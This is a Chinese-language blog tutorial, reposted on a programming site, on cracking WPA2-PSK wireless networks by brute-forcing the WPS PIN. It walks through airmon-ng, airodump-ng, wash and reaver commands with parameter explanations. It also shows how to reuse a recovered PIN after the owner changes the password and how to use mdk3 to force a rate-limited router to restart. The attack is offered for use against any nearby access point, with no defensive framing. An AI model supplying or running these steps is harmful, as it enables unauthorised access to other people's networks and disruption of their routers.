1. 全栈程序员必看首页

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

全栈程序员-用户IM 未分类

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]【前言】现在的路由器大多都默认用WPA2-PSK方式对无线网络进行加密了,不能再像WEP加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供WPS功能,通过这个功能,用户可以使用PIN码登录到路由器。但这个PIN码的长度只有8位,而且可能的取值只有11000种(注意,不是10…

大家好,又见面了,我是你们的朋友全栈君。

【前言】

    现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位,而且可能的取值只有11000种(注意,不是 10^8 种)。所以我们可以进行简单粗暴的穷举 PIN 码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。

 

【操作步骤】

1、切换无线网卡到监听模式:
    airmon-ng  start  wlan0

2、刺探附近 WLAN 网络(这个命令所跟的参数值可以在 步骤1 完成后从提示信息中查看到):
    airodump-ng  wlan0mon

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址):
    wash  -i  wlan0mon

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v):
    reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明:
-i  无线网卡名称
-b  目标AP的mac地址
-a  自动检测目标AP最佳配置
-S  使用最小的DH key,可以提高破解速度
-vv  显示更多的非严重警告(注意这是 2 个小写字母 v)
-d  即delay每穷举一次的闲置时间 预设为1秒
-c  信道编号
-p  PIN码四位或八位  //可以用8位直接找到密码。

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

 

4、等待破解完成(这个破解可能会时间比较长,和你的目标 AP 有关,我当时花费了 12 个小时才破解出来),这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度 信息:

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

破解完成后,查看并记录下 PIN码 和 密码:

  使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

 

5、获取到 PIN码 后,以后即便路由器更换了密码,我们也可以很迅速地通过 PIN码 重新获得新密码。以上方获取到的信息举例:

    reaver  -i  wlan0mon -b  xx:xx:xx:xx:xx:xx  -p 12316977

 

【注意事项】

    1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息,那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

    2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息,这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的,当连续使用超过某个次数的 PIN码 后,路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能,要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (这是上面的目标AP的MAC地址)命令让路由器主动重启或被动重启以恢复 WPS 功能。

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/136049.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
全栈程序员-用户IM全栈程序员-用户IM
0 0


相关推荐

  • python字符串转义字符_python 转义

    python字符串转义字符_python 转义

    python字符串转义字符_python 转义上图中因为python不知到如何处理一对单引号之后的内容,不能识别第三个单引号。(默认都是以一对单引号或双引号来表示字符串从结束到开始。)长字符串:用三个引号(单引号或者双引号)来代表字符串开始和结束例如在有些情况下,就需要用转义:(1)>>>path=’c:\nowhere’输出的内容换行,不是想要的结果,我们就需要转义用反斜杠\来转义…

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年10月23日
  • python贪吃蛇游戏代码详解外加中文_Python贪吃蛇代码

    python贪吃蛇游戏代码详解外加中文_Python贪吃蛇代码

    python贪吃蛇游戏代码详解外加中文_Python贪吃蛇代码#!/usr/bin/envpythonimportpygame,sys,time,randomfrompygame.localsimport*#定义颜色变量redColour=pygame.Color(255,0,0)blackColour=pygame.Color(0,0,0)whiteColour=pygame.Color(255,255,255)greyColour…

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年8月10日
  • dataframe loc iloc_python的isnull函数

    dataframe loc iloc_python的isnull函数

    dataframe loc iloc_python的isnull函数关于python数据分析常用库pandas中的DataFrame的loc和iloc取数据基本方法总结归纳及示例

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年8月30日
  • Vagrant 基本使用操作

    Vagrant 基本使用操作

    Vagrant 基本使用操作OthersVagrant基本使用操作Vagrant是什么?Vagrant安装Vagrant快速上手安装CentOSVagrant基本命令小结Vagrantfile文件Vagrant基本使用操作Vagrant是什么?Vagrant是一款支持自动化虚拟机暗转、可配置流程的用于管理虚拟机的软件.主要的优势在于可以提供一个可配置、可移植和复用的虚拟机环境(通过定义Vagr…

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年10月25日
  • SQL语句学习

    SQL语句学习

    SQL语句学习*以下内容是我在学习SQL(http://www.w3school.com.cn/sql/index.asp)的时候的学习笔记*学习时使用的数据库软件是MySQL数据库可视化工具SQLyogEn

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年8月5日
  • 运算放大器典型电路及原理

    运算放大器典型电路及原理

    运算放大器典型电路及原理1.运算放大器工作原理综述:  运算放大器组成的电路五花八门,令人眼花瞭乱,在分析运算放大器工作原理时倘没有抓住核心,往往令人头大。本文收集运放电路的应用电路,希望看完后有所收获。但是在分析各个电路之前,还是先回忆一下两个运放教材里必教的技能,就是“虚短”和“虚断”。“虚短”是指在分析运算放大器处于线性状态时,可把两输入端视为等电位,这一特性称为虚假短路,简称虚短。显然不能将两输入端真正短路。…

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年4月29日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号